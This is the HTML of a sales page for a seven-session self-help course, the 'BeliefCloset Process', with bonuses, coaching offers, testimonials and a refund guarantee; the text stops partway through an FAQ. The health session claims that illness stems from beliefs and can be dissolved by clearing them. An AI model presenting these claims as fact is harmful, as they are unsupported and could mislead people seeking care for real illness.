href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><FONT COLOR="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus 